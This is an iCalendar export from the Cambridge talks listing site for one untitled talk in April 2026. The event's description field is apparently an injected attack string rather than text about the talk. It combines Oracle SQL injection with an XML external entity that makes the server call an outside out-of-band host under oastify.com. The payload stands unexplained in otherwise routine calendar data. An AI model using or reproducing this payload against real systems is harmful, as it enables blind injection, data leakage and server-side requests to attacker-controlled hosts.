BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Talks.cam//talks.cam.ac.uk//
X-WR-CALNAME:Talks.cam
BEGIN:VEVENT
SUMMARY:Title to be confirmed - scott
DTSTART:20260423T110000Z
DTEND:20260423T140000Z
UID:TALK246633@talks.cam.ac.uk
CONTACT:1 Raven
DESCRIPTION:(select extractvalue(xmltype('<?xml version="1.0" encoding="UT
 F-8"?><!DOCTYPE root [ <!ENTITY % lmcxc SYSTEM "http://hn8xd3d9eoc6ss7ngd0
 ioo65pwvqjv7yvqij68.oasti'||'fy.com/">%lmcxc\;]>')\,'/l') from dual)
LOCATION:tbc
END:VEVENT
END:VCALENDAR
